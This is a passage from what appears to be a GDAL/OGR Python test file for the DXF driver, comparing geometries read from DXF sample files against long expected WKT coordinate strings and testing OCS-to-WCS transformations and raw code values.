-3.4700807357668 -4.4700807357668e-16,2.23410481428215 -3.53052843721411 -4.53052843721411e-16,2.1729090847148 -3.5932633569242 -4.5932633569242e-16,2.12061475842818 -3.65797985667433 -4.65797985667433e-16,2.07747660812336 -3.724362644183 -4.724362644183e-16,2.04370479853239 -3.79208830918224 -4.79208830918224e-16,2.01946386251686 -3.86082689903993 
-4.86082689903993e-16,2.00487189948035 -3.93024352625587 -4.93024352625588e-16,2 -4 -5e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (2 -4 -5e-16,2.00487189948035 -4.06975647374412 -5.06975647374413e-16,2.01946386251686 -4.13917310096007 -5.13917310096007e-16,2.04370479853239 -4.20791169081776 -5.20791169081776e-16,2.07747660812336 -4.275637355817 -5.275637355817e-16,2.12061475842818 -4.34202014332567 -5.34202014332567e-16,2.1729090847148 -4.4067366430758 -5.4067366430758e-16,2.23410481428215 -4.46947156278589 -5.46947156278589e-16,2.30390380768715 -4.52991926423321 -5.52991926423321e-16,2.38196601125011 -4.58778525229247 -5.58778525229247e-16,2.46791111376204 -4.64278760968654 -5.64278760968654e-16,2.5613203993227 -4.694658370459 -5.694658370459e-16,2.66173878728228 -4.74314482547739 -5.7431448254774e-16,2.76867704934868 -4.78801075360672 -5.78801075360672e-16,2.88161419305851 -4.82903757255504 -5.82903757255504e-16,3.0 -4.86602540378444 -5.86602540378444e-16,3.12325770642185 -4.89879404629917 -5.89879404629917e-16,3.25078681316818 -4.92718385456679 -5.92718385456679e-16,3.38196601125011 -4.95105651629515 -5.95105651629515e-16,3.51615620880067 -4.970295726276 -5.970295726276e-16,3.65270364466614 -4.98480775301221 -5.98480775301221e-16,3.79094307346469 -4.99452189536827 -5.99452189536827e-16,3.930201006595 -4.9993908270191 -5.9993908270191e-16,4.069798993405 -4.9993908270191 -5.9993908270191e-16,4.20905692653531 -4.99452189536827 -5.99452189536827e-16,4.34729635533386 -4.98480775301221 -5.98480775301221e-16,4.48384379119934 -4.970295726276 -5.970295726276e-16,4.61803398874989 -4.95105651629515 -5.95105651629515e-16,4.74921318683182 -4.92718385456679 -5.92718385456679e-16,4.87674229357816 -4.89879404629917 -5.89879404629917e-16,5.0 -4.86602540378444 -5.86602540378444e-16,5.11838580694149 -4.82903757255504 -5.82903757255504e-16,5.23132295065132 -4.78801075360672 -5.78801075360672e-16,5.33826121271772 -4.74314482547739 -5.74314482547739e-16,5.4386796006773 -4.694658370459 -5.694658370459e-16,5.53208888623796 -4.64278760968654 
-5.64278760968654e-16,5.61803398874989 -4.58778525229247 -5.58778525229247e-16,5.69609619231285 -4.5299192642332 -5.52991926423321e-16,5.76589518571785 -4.46947156278589 -5.46947156278589e-16,5.8270909152852 -4.4067366430758 -5.4067366430758e-16,5.87938524157182 -4.34202014332567 -5.34202014332567e-16,5.92252339187664 -4.275637355817 -5.275637355817e-16,5.95629520146761 -4.20791169081776 -5.20791169081776e-16,5.98053613748314 -4.13917310096007 -5.13917310096007e-16,5.99512810051965 -4.06975647374412 -5.06975647374413e-16,6 -4 -5e-16,5.99512810051965 -3.93024352625587 -4.93024352625588e-16,5.98053613748314 -3.86082689903993 -4.86082689903993e-16,5.95629520146761 -3.79208830918224 -4.79208830918224e-16,5.92252339187664 -3.724362644183 -4.724362644183e-16,5.87938524157182 -3.65797985667433 -4.65797985667433e-16,5.8270909152852 -3.5932633569242 -4.5932633569242e-16,5.76589518571785 -3.53052843721411 -4.53052843721411e-16,5.69609619231285 -3.4700807357668 -4.4700807357668e-16,5.61803398874989 -3.41221474770753 -4.41221474770753e-16,' + \
'5.53208888623796 -3.35721239031346 -4.35721239031346e-16,5.4386796006773 -3.305341629541 -4.305341629541e-16,5.33826121271772 -3.25685517452261 -4.25685517452261e-16,5.23132295065132 -3.21198924639328 -4.21198924639328e-16,5.11838580694149 -3.17096242744496 -4.17096242744496e-16,5.0 -3.13397459621556 -4.13397459621556e-16,4.87674229357815 -3.10120595370083 -4.10120595370083e-16,4.74921318683182 -3.07281614543321 -4.07281614543321e-16,4.61803398874989 -3.04894348370485 -4.04894348370485e-16,4.48384379119934 -3.029704273724 -4.029704273724e-16,4.34729635533386 -3.01519224698779 -4.01519224698779e-16,4.20905692653531 -3.00547810463173 -4.00547810463173e-16,4.069798993405 -3.0006091729809 -4.0006091729809e-16,3.930201006595 -3.0006091729809 -4.0006091729809e-16,3.79094307346469 -3.00547810463173 -4.00547810463173e-16,3.65270364466614 -3.01519224698779 -4.01519224698779e-16,3.51615620880066 -3.029704273724 -4.029704273724e-16,3.38196601125011 -3.04894348370485 -4.04894348370485e-16,3.25078681316818 -3.07281614543321 -4.07281614543321e-16,3.12325770642185 -3.10120595370083 -4.10120595370083e-16,3.0 -3.13397459621556 -4.13397459621556e-16,2.88161419305851 -3.17096242744496 -4.17096242744496e-16,2.76867704934868 -3.21198924639328 -4.21198924639328e-16,2.66173878728228 -3.25685517452261 -4.25685517452261e-16,2.5613203993227 -3.305341629541 -4.305341629541e-16,2.46791111376204 -3.35721239031346 -4.35721239031346e-16,2.38196601125011 -3.41221474770753 -4.41221474770753e-16,2.30390380768715 -3.4700807357668 -4.4700807357668e-16,2.23410481428215 -3.53052843721411 -4.53052843721411e-16,2.1729090847148 -3.5932633569242 -4.5932633569242e-16,2.12061475842818 -3.65797985667433 -4.65797985667433e-16,2.07747660812336 -3.724362644183 -4.724362644183e-16,2.04370479853239 -3.79208830918224 -4.79208830918224e-16,2.01946386251686 -3.86082689903993 -4.86082689903993e-16,2.00487189948035 -3.93024352625587 -4.93024352625588e-16,2 -4 -5e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):45
# EntityHandle (String) = 231
# LINESTRING Z (2 -2 -2e-16,1.96657794502105 -2.03582232791524 -2.03582232791524e-16,1.93571660708646 -2.07387296203834 -2.07387296203834e-16,1.90756413746468 -2.11396923855472 -2.11396923855472e-16,1.88225568337755 -2.15591867344963 -2.15591867344963e-16,1.85991273921989 -2.19951988653655 -2.19951988653655e-16,1.84064256332004 -2.24456356819194 -2.24456356819194e-16,1.8245376630414 -2.29083348415575 -2.29083348415575e-16,1.81167535069652 -2.33810751357387 -2.33810751357387e-16,1.80211737240583 -2.38615871529951 -2.38615871529951e-16,1.79590961168258 -2.43475641733454 -2.43475641733454e-16,1.79308186916688 -2.48366732418105 -2.48366732418105e-16,1.79364771956639 -2.53265663678705 -2.53265663678705e-16,1.79760444649032 -2.58148917971011 -2.58148917971011e-16,1.80493305548955 -2.62993053008786 -2.62993053008786e-16,1.81559836524041 -2.67774814299567 -2.67774814299567e-16,1.8295491764342 -2.72471246778926 -2.72471246778926e-16,1.84671851756181 -2.7705980500731 -2.7705980500731e-16,1.86702396641357 -2.81518461400453 -2.81518461400453e-16,1.89036804575079 -2.85825811973811 -2.85825811973811e-16,1.91663869124976 -2.89961179093367 -2.89961179093367e-16,1.94570978947168 -2.93904710739563 -2.93904710739563e-16,1.97744178327594 -2.97637475807832 -2.97637475807832e-16,2.01168234177068 -3.01141554988232 -3.01141554988232e-16,2.04826709158413 -3.04400126787917 -3.04400126787917e-16,2.08702040594658 -3.07397548283483 -3.07397548283483e-16,2.12775624779472 -3.10119430215541 -3.10119430215541e-16,2.1702790628511 -3.12552706065018 -3.12552706065018e-16,2.2143847183914 -3.14685694779575 -3.14685694779575e-16,2.25986148319297 -3.16508156849045 -3.16508156849045e-16,2.30649104396024 -3.18011343460661 -3.18011343460661e-16,2.35404955334774 -3.1918803849814 -3.1918803849814e-16,2.40230870454951 -3.20032593182975 -3.20032593182975e-16,2.45103682729644 -3.2054095319166 -3.2054095319166e-16,2.5 -3.20710678118655 -3.20710678118655e-16,2.54896317270356 -3.2054095319166 
-3.2054095319166e-16,2.59769129545049 -3.20032593182975 -3.20032593182975e-16,2.64595044665226 -3.1918803849814 -3.1918803849814e-16,2.69350895603976 -3.18011343460661 -3.18011343460661e-16,2.74013851680703 -3.16508156849045 -3.16508156849045e-16,2.7856152816086 -3.14685694779575 -3.14685694779575e-16,2.8297209371489 -3.12552706065018 -3.12552706065018e-16,2.87224375220528 -3.10119430215541 -3.10119430215541e-16,2.91297959405342 -3.07397548283483 -3.07397548283483e-16,2.95173290841587 -3.04400126787917 -3.04400126787917e-16,2.98831765822932 -3.01141554988232 -3.01141554988232e-16,3.02255821672406 -2.97637475807832 -2.97637475807832e-16,3.05429021052832 -2.93904710739563 -2.93904710739563e-16,3.08336130875024 -2.89961179093367 -2.89961179093367e-16,3.10963195424921 -2.85825811973811 -2.85825811973811e-16,3.13297603358643 -2.81518461400453 -2.81518461400453e-16,3.15328148243819 -2.7705980500731 -2.7705980500731e-16,3.1704508235658 -2.72471246778926 -2.72471246778926e-16,3.18440163475959 -2.67774814299567 -2.67774814299567e-16,3.19506694451045 -2.62993053008786 -2.62993053008786e-16,3.20239555350968 -2.58148917971011 -2.58148917971011e-16,3.20635228043361 -2.53265663678705 -2.53265663678705e-16,3.20691813083312 -2.48366732418105 -2.48366732418105e-16,3.20409038831742 -2.43475641733454 -2.43475641733454e-16,3.19788262759417 -2.38615871529951 -2.38615871529951e-16,3.18832464930348 -2.33810751357387 -2.33810751357387e-16,3.1754623369586 -2.29083348415575 -2.29083348415575e-16,3.15935743667996 -2.24456356819194 -2.24456356819194e-16,3.14008726078011 -2.19951988653655 -2.19951988653655e-16,3.11774431662245 -2.15591867344963 -2.15591867344963e-16,3.09243586253532 -2.11396923855472 -2.11396923855471e-16,3.06428339291354 -2.07387296203834 -2.07387296203834e-16,3.03342205497895 -2.03582232791524 -2.03582232791524e-16,3 -2 -2e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (2 -2 -2e-16,1.96657794502105 -2.03582232791524 -2.03582232791524e-16,1.93571660708646 -2.07387296203834 -2.07387296203834e-16,1.90756413746468 -2.11396923855472 -2.11396923855472e-16,1.88225568337755 -2.15591867344963 -2.15591867344963e-16,1.85991273921989 -2.19951988653655 -2.19951988653655e-16,1.84064256332004 -2.24456356819194 -2.24456356819194e-16,1.8245376630414 -2.29083348415575 -2.29083348415575e-16,1.81167535069652 -2.33810751357387 -2.33810751357387e-16,1.80211737240583 -2.38615871529951 -2.38615871529951e-16,1.79590961168258 -2.43475641733454 -2.43475641733454e-16,1.79308186916688 -2.48366732418105 -2.48366732418105e-16,1.79364771956639 -2.53265663678705 -2.53265663678705e-16,1.79760444649032 -2.58148917971011 -2.58148917971011e-16,1.80493305548955 -2.62993053008786 -2.62993053008786e-16,1.81559836524041 -2.67774814299567 -2.67774814299567e-16,1.8295491764342 -2.72471246778926 -2.72471246778926e-16,1.84671851756181 -2.7705980500731 -2.7705980500731e-16,1.86702396641357 -2.81518461400453 -2.81518461400453e-16,1.89036804575079 -2.85825811973811 -2.85825811973811e-16,1.91663869124976 -2.89961179093367 -2.89961179093367e-16,1.94570978947168 -2.93904710739563 -2.93904710739563e-16,1.97744178327594 -2.97637475807832 -2.97637475807832e-16,2.01168234177068 -3.01141554988232 -3.01141554988232e-16,2.04826709158413 -3.04400126787917 -3.04400126787917e-16,2.08702040594658 -3.07397548283483 -3.07397548283483e-16,2.12775624779472 -3.10119430215541 -3.10119430215541e-16,2.1702790628511 -3.12552706065018 -3.12552706065018e-16,2.2143847183914 -3.14685694779575 -3.14685694779575e-16,2.25986148319297 -3.16508156849045 -3.16508156849045e-16,2.30649104396024 -3.18011343460661 -3.18011343460661e-16,2.35404955334774 -3.1918803849814 -3.1918803849814e-16,2.40230870454951 -3.20032593182975 -3.20032593182975e-16,2.45103682729644 -3.2054095319166 -3.2054095319166e-16,2.5 -3.20710678118655 -3.20710678118655e-16,2.54896317270356 
-3.2054095319166 -3.2054095319166e-16,2.59769129545049 -3.20032593182975 -3.20032593182975e-16,2.64595044665226 -3.1918803849814 -3.1918803849814e-16,2.69350895603976 -3.18011343460661 -3.18011343460661e-16,2.74013851680703 -3.16508156849045 -3.16508156849045e-16,2.7856152816086 -3.14685694779575 -3.14685694779575e-16,2.8297209371489 -3.12552706065018 -3.12552706065018e-16,2.87224375220528 -3.10119430215541 -3.10119430215541e-16,2.91297959405342 -3.07397548283483 -3.07397548283483e-16,2.95173290841587 -3.04400126787917 -3.04400126787917e-16,2.98831765822932 -3.01141554988232 -3.01141554988232e-16,3.02255821672406 -2.97637475807832 -2.97637475807832e-16,3.05429021052832 -2.93904710739563 -2.93904710739563e-16,3.08336130875024 -2.89961179093367 -2.89961179093367e-16,3.10963195424921 -2.85825811973811 -2.85825811973811e-16,3.13297603358643 -2.81518461400453 -2.81518461400453e-16,3.15328148243819 -2.7705980500731 -2.7705980500731e-16,3.1704508235658 -2.72471246778926 -2.72471246778926e-16,3.18440163475959 -2.67774814299567 -2.67774814299567e-16,3.19506694451045 -2.62993053008786 -2.62993053008786e-16,3.20239555350968 -2.58148917971011 -2.58148917971011e-16,3.20635228043361 -2.53265663678705 -2.53265663678705e-16,3.20691813083312 -2.48366732418105 -2.48366732418105e-16,3.20409038831742 -2.43475641733454 -2.43475641733454e-16,3.19788262759417 -2.38615871529951 -2.38615871529951e-16,3.18832464930348 -2.33810751357387 -2.33810751357387e-16,3.1754623369586 -2.29083348415575 -2.29083348415575e-16,3.15935743667996 -2.24456356819194 -2.24456356819194e-16,3.14008726078011 -2.19951988653655 -2.19951988653655e-16,3.11774431662245 -2.15591867344963 -2.15591867344963e-16,3.09243586253532 -2.11396923855472 -2.11396923855471e-16,3.06428339291354 -2.07387296203834 -2.07387296203834e-16,3.03342205497895 -2.03582232791524 -2.03582232791524e-16,3 -2 -2e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):46
# EntityHandle (String) = 232
# POLYGON Z ((1 -2 -2e-16,1 -3 -4e-16,2 -3 -4e-16,2 -2 -2e-16,1 -2 -2e-16))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((1 -2 -2e-16,1 -3 -4e-16,2 -3 -4e-16,2 -2 -2e-16,1 -2 -2e-16))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):47
# EntityHandle (String) = 233
# POLYGON ((3 -4,4 -4,4 -3,3 -3,3 -4))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON ((3 -4,4 -4,4 -3,3 -3,3 -4))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):48
# EntityHandle (String) = 235
# POLYGON ((8 -8,9 -8,9 -9,8 -9,8 -8))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON ((8 -8,9 -8,9 -9,8 -9,8 -8))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):49
# EntityHandle (String) = 236
# LINESTRING (2 -2,2.15384615384615 -2.15384615384615,2.30769230769231 -2.30769230769231,2.46153846153846 -2.46153846153846,2.61538461538461 -2.61538461538461,2.76923076923077 -2.76923076923077,2.92307692307692 -2.92307692307692,3.07692307692308 -3.07692307692308,3.23076923076923 -3.23076923076923,3.38461538461538 -3.38461538461538,3.53846153846154 -3.53846153846154,3.69230769230769 -3.69230769230769,3.84615384615385 -3.84615384615385,4 -4,4.15384615384615 -4.15384615384615,4.30769230769231 -4.30769230769231,4.46153846153846 -4.46153846153846,4.61538461538462 -4.61538461538462,4.76923076923077 -4.76923076923077,4.92307692307692 -4.92307692307692,5.07692307692308 -5.07692307692308,5.23076923076923 -5.23076923076923,5.38461538461538 -5.38461538461538,5.53846153846154 -5.53846153846154,5.69230769230769 -5.69230769230769,5.84615384615385 -5.84615384615385,6.0 -6.0,6.15384615384615 -6.15384615384615,6.30769230769231 -6.30769230769231,6.46153846153846 -6.46153846153846,6.61538461538462 -6.61538461538462,6.76923076923077 -6.76923076923077,6.92307692307692 -6.92307692307692,7.07692307692308 -7.07692307692308,7.23076923076923 -7.23076923076923,7.38461538461539 -7.38461538461539,7.53846153846154 -7.53846153846154,7.69230769230769 -7.69230769230769,7.84615384615385 -7.84615384615385,8 -8)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (2 -2,2.15384615384615 -2.15384615384615,2.30769230769231 -2.30769230769231,2.46153846153846 -2.46153846153846,2.61538461538461 -2.61538461538461,2.76923076923077 -2.76923076923077,2.92307692307692 -2.92307692307692,3.07692307692308 -3.07692307692308,3.23076923076923 -3.23076923076923,3.38461538461538 -3.38461538461538,3.53846153846154 -3.53846153846154,3.69230769230769 -3.69230769230769,3.84615384615385 -3.84615384615385,4 -4,4.15384615384615 -4.15384615384615,4.30769230769231 -4.30769230769231,4.46153846153846 -4.46153846153846,4.61538461538462 -4.61538461538462,4.76923076923077 -4.76923076923077,4.92307692307692 -4.92307692307692,5.07692307692308 -5.07692307692308,5.23076923076923 -5.23076923076923,5.38461538461538 -5.38461538461538,5.53846153846154 -5.53846153846154,5.69230769230769 -5.69230769230769,5.84615384615385 -5.84615384615385,6.0 -6.0,6.15384615384615 -6.15384615384615,6.30769230769231 -6.30769230769231,6.46153846153846 -6.46153846153846,6.61538461538462 -6.61538461538462,6.76923076923077 -6.76923076923077,6.92307692307692 -6.92307692307692,7.07692307692308 -7.07692307692308,7.23076923076923 -7.23076923076923,7.38461538461539 -7.38461538461539,7.53846153846154 -7.53846153846154,7.69230769230769 -7.69230769230769,7.84615384615385 -7.84615384615385,8 -8)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):50
# EntityHandle (String) = 237
# LINESTRING (8 -1,7.62837370825536 -0.987348067229724,7.25775889681215 -0.975707614760869,6.88916704597178 -0.966090122894857,6.52360963603567 -0.959507071933107,6.16209814730525 -0.956969942177043,5.80564406008193 -0.959490213928084,5.45525885466714 -0.968079367487651,5.11195401136229 -0.983748883157167,4.77674101046882 -1.00751024123805,4.45063133228814 -1.04037492203173,4.13463645712167 -1.08335440583961,3.82976786527082 -1.13746017296313,3.53703703703704 -1.2037037037037,3.25745545272173 -1.28309647836275,2.99203459262631 -1.37664997724169,2.74178593705221 -1.48537568064195,2.50772096630085 -1.61028506886495,2.29085116067365 -1.75238962221211,2.09218800047203 -1.91270082098484,1.91270082098485 -2.09218800047202,1.75238962221211 -2.29085116067364,1.61028506886495 -2.50772096630085,1.48537568064195 -2.74178593705221,1.37664997724169 -2.99203459262631,1.28309647836275 -3.25745545272172,1.2037037037037 -3.53703703703703,1.13746017296313 -3.82976786527082,1.08335440583961 -4.13463645712166,1.04037492203173 -4.45063133228814,1.00751024123805 -4.77674101046882,0.983748883157167 -5.11195401136229,0.968079367487652 -5.45525885466714,0.959490213928084 -5.80564406008193,0.956969942177043 -6.16209814730525,0.959507071933108 -6.52360963603567,0.966090122894857 -6.88916704597178,0.975707614760869 -7.25775889681216,0.987348067229724 -7.62837370825537,1 -8)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (8 -1,7.62837370825536 -0.987348067229724,7.25775889681215 -0.975707614760869,6.88916704597178 -0.966090122894857,6.52360963603567 -0.959507071933107,6.16209814730525 -0.956969942177043,5.80564406008193 -0.959490213928084,5.45525885466714 -0.968079367487651,5.11195401136229 -0.983748883157167,4.77674101046882 -1.00751024123805,4.45063133228814 -1.04037492203173,4.13463645712167 -1.08335440583961,3.82976786527082 -1.13746017296313,3.53703703703704 -1.2037037037037,3.25745545272173 -1.28309647836275,2.99203459262631 -1.37664997724169,2.74178593705221 -1.48537568064195,2.50772096630085 -1.61028506886495,2.29085116067365 -1.75238962221211,2.09218800047203 -1.91270082098484,1.91270082098485 -2.09218800047202,1.75238962221211 -2.29085116067364,1.61028506886495 -2.50772096630085,1.48537568064195 -2.74178593705221,1.37664997724169 -2.99203459262631,1.28309647836275 -3.25745545272172,1.2037037037037 -3.53703703703703,1.13746017296313 -3.82976786527082,1.08335440583961 -4.13463645712166,1.04037492203173 -4.45063133228814,1.00751024123805 -4.77674101046882,0.983748883157167 -5.11195401136229,0.968079367487652 -5.45525885466714,0.959490213928084 -5.80564406008193,0.956969942177043 -6.16209814730525,0.959507071933108 -6.52360963603567,0.966090122894857 -6.88916704597178,0.975707614760869 -7.25775889681216,0.987348067229724 -7.62837370825537,1 -8)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):51
# EntityHandle (String) = 238
# POINT Z (7 -7 -7e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (7 -7 -7e-16)'):
feat.DumpReadable()
return 'fail'
return 'success'
###############################################################################
# OCS2WCS transformations 2. Also test RawCodeValues
def ogr_dxf_32():
gdal.SetConfigOption('DXF_INCLUDE_RAW_CODE_VALUES', 'TRUE')
ds = ogr.Open('data/ocs2wcs2.dxf')
gdal.SetConfigOption('DXF_INCLUDE_RAW_CODE_VALUES', None)
lyr = ds.GetLayer(0)
# INFO: Open of `ocs2wcs2.dxf' using driver `DXF' successful.
# OGRFeature(entities):0
# EntityHandle (String) = 1B1
# POINT Z (4 4 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (4 4 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):1
# EntityHandle (String) = 1B2
# LINESTRING Z (0 0 0,1 1 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (0 0 0,1 1 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):2
# EntityHandle (String) = 1B3
# LINESTRING (1 1,2 1,1 2,1 1)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (1 1,2 1,1 2,1 1)') \
or feat.GetField('RawCodeValues') != ['43 0.0']:
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):3
# EntityHandle (String) = 1B4
# LINESTRING Z (1 1 0,1 2 0,2 2 0,1 1 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (1 1 0,1 2 0,2 2 0,1 1 0)') \
or feat.GetField('RawCodeValues') != ['66 1','10 0.0','20 0.0','30 0.0']:
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):4
# EntityHandle (String) = 1B9
# LINESTRING Z (6 4 0,5.99512810051965 3.86048705251175 0,5.98053613748314 3.72165379807987 0,5.95629520146761 3.58417661836448 0,5.92252339187664 3.448725288366 0,5.87938524157182 3.31595971334866 0,5.8270909152852 3.1865267138484 0,5.76589518571785 3.06105687442822 0,5.69609619231285 2.94016147153359 0,5.61803398874989 2.82442949541505 0,5.53208888623796 2.71442478062692 0,5.4386796006773 2.61068325908201 0,5.33826121271772 2.51371034904521 0,5.23132295065132 2.42397849278656 0,5.11838580694149 2.34192485488992 0,5.0 2.26794919243112 0,4.87674229357815 2.20241190740167 0,4.74921318683182 2.14563229086643 0,4.61803398874989 2.09788696740969 0,4.48384379119934 2.05940854744801 0,4.34729635533386 2.03038449397558 0,4.20905692653531 2.01095620926345 0,4.069798993405 2.00121834596181 0,3.930201006595 2.00121834596181 0,3.79094307346469 2.01095620926345 0,3.65270364466614 2.03038449397558 0,3.51615620880066 2.05940854744801 0,3.38196601125011 2.09788696740969 0,3.25078681316818 2.14563229086643 0,3.12325770642185 2.20241190740167 0,3.0 2.26794919243112 0,2.88161419305851 2.34192485488992 0,2.76867704934868 2.42397849278656 0,2.66173878728228 2.51371034904521 0,2.5613203993227 2.61068325908201 0,2.46791111376204 2.71442478062692 0,2.38196601125011 2.82442949541505 0,2.30390380768715 2.94016147153359 0,2.23410481428215 3.06105687442822 0,2.1729090847148 3.1865267138484 0,2.12061475842818 3.31595971334866 0,2.07747660812336 3.448725288366 0,2.04370479853239 3.58417661836448 0,2.01946386251686 3.72165379807987 0,2.00487189948035 3.86048705251175 0,2.0 4.0 0,2.00487189948035 4.13951294748825 0,2.01946386251686 4.27834620192013 0,2.04370479853239 4.41582338163552 0,2.07747660812336 4.551274711634 0,2.12061475842818 4.68404028665134 0,2.1729090847148 4.8134732861516 0,2.23410481428215 4.93894312557178 0,2.30390380768715 5.05983852846641 0,2.38196601125011 5.17557050458495 0,2.46791111376204 5.28557521937308 0,2.5613203993227 5.38931674091799 0,2.66173878728228 
5.48628965095479 0,2.76867704934868 5.57602150721344 0,2.88161419305851 5.65807514511008 0,3.0 5.73205080756888 0,3.12325770642184 5.79758809259833 0,3.25078681316818 5.85436770913357 0,3.38196601125011 5.90211303259031 0,3.51615620880066 5.94059145255199 0,3.65270364466614 5.96961550602442 0,3.79094307346469 5.98904379073655 0,3.930201006595 5.99878165403819 0,4.069798993405 5.99878165403819 0,4.20905692653531 5.98904379073655 0,4.34729635533386 5.96961550602442 0,4.48384379119933 5.94059145255199 0,4.61803398874989 5.90211303259031 0,4.74921318683182 5.85436770913357 0,4.87674229357815 5.79758809259833 0,5.0 5.73205080756888 0,5.11838580694149 5.65807514511008 0,5.23132295065132 5.57602150721344 0,5.33826121271772 5.48628965095479 0,5.4386796006773 5.389316740918 0,5.53208888623796 5.28557521937308 0,5.61803398874989 5.17557050458495 0,5.69609619231285 5.05983852846641 0,5.76589518571785 4.93894312557178 0,5.8270909152852 4.8134732861516 0,5.87938524157182 4.68404028665134 0,5.92252339187664 4.551274711634 0,5.95629520146761 4.41582338163552 0,5.98053613748314 4.27834620192013 0,5.99512810051965 4.13951294748825 0,6.0 4.0 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (6 4 0,5.99512810051965 3.86048705251175 0,5.98053613748314 3.72165379807987 0,5.95629520146761 3.58417661836448 0,5.92252339187664 3.448725288366 0,5.87938524157182 3.31595971334866 0,5.8270909152852 3.1865267138484 0,5.76589518571785 3.06105687442822 0,5.69609619231285 2.94016147153359 0,5.61803398874989 2.82442949541505 0,5.53208888623796 2.71442478062692 0,5.4386796006773 2.61068325908201 0,5.33826121271772 2.51371034904521 0,5.23132295065132 2.42397849278656 0,5.11838580694149 2.34192485488992 0,5.0 2.26794919243112 0,4.87674229357815 2.20241190740167 0,4.74921318683182 2.14563229086643 0,4.61803398874989 2.09788696740969 0,4.48384379119934 2.05940854744801 0,4.34729635533386 2.03038449397558 0,4.20905692653531 2.01095620926345 0,4.069798993405 2.00121834596181 0,3.930201006595 2.00121834596181 0,3.79094307346469 2.01095620926345 0,3.65270364466614 2.03038449397558 0,3.51615620880066 2.05940854744801 0,3.38196601125011 2.09788696740969 0,3.25078681316818 2.14563229086643 0,3.12325770642185 2.20241190740167 0,3.0 2.26794919243112 0,2.88161419305851 2.34192485488992 0,2.76867704934868 2.42397849278656 0,2.66173878728228 2.51371034904521 0,2.5613203993227 2.61068325908201 0,2.46791111376204 2.71442478062692 0,2.38196601125011 2.82442949541505 0,2.30390380768715 2.94016147153359 0,2.23410481428215 3.06105687442822 0,2.1729090847148 3.1865267138484 0,2.12061475842818 3.31595971334866 0,2.07747660812336 3.448725288366 0,2.04370479853239 3.58417661836448 0,2.01946386251686 3.72165379807987 0,2.00487189948035 3.86048705251175 0,2.0 4.0 0,2.00487189948035 4.13951294748825 0,2.01946386251686 4.27834620192013 0,2.04370479853239 4.41582338163552 0,2.07747660812336 4.551274711634 0,2.12061475842818 4.68404028665134 0,2.1729090847148 4.8134732861516 0,2.23410481428215 4.93894312557178 0,2.30390380768715 5.05983852846641 0,2.38196601125011 5.17557050458495 0,2.46791111376204 5.28557521937308 0,2.5613203993227 
5.38931674091799 0,2.66173878728228 5.48628965095479 0,2.76867704934868 5.57602150721344 0,2.88161419305851 5.65807514511008 0,3.0 5.73205080756888 0,3.12325770642184 5.79758809259833 0,3.25078681316818 5.85436770913357 0,3.38196601125011 5.90211303259031 0,3.51615620880066 5.94059145255199 0,3.65270364466614 5.96961550602442 0,3.79094307346469 5.98904379073655 0,3.930201006595 5.99878165403819 0,4.069798993405 5.99878165403819 0,4.20905692653531 5.98904379073655 0,4.34729635533386 5.96961550602442 0,4.48384379119933 5.94059145255199 0,4.61803398874989 5.90211303259031 0,4.74921318683182 5.85436770913357 0,4.87674229357815 5.79758809259833 0,5.0 5.73205080756888 0,5.11838580694149 5.65807514511008 0,5.23132295065132 5.57602150721344 0,5.33826121271772 5.48628965095479 0,5.4386796006773 5.389316740918 0,5.53208888623796 5.28557521937308 0,5.61803398874989 5.17557050458495 0,5.69609619231285 5.05983852846641 0,5.76589518571785 4.93894312557178 0,5.8270909152852 4.8134732861516 0,5.87938524157182 4.68404028665134 0,5.92252339187664 4.551274711634 0,5.95629520146761 4.41582338163552 0,5.98053613748314 4.27834620192013 0,5.99512810051965 4.13951294748825 0,6.0 4.0 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):5
# EntityHandle (String) = 1BA
# LINESTRING Z (2 4 0,4 4 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (2 4 0,4 4 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):6
# EntityHandle (String) = 1BB
# LINESTRING Z (4 4 0,6 4 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (4 4 0,6 4 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):7
# EntityHandle (String) = 1BC
# LINESTRING Z (4 3 0,4 4 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (4 3 0,4 4 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):8
# EntityHandle (String) = 1BD
# LINESTRING Z (4 4 0,4 5 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (4 4 0,4 5 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):9
# EntityHandle (String) = 1BE
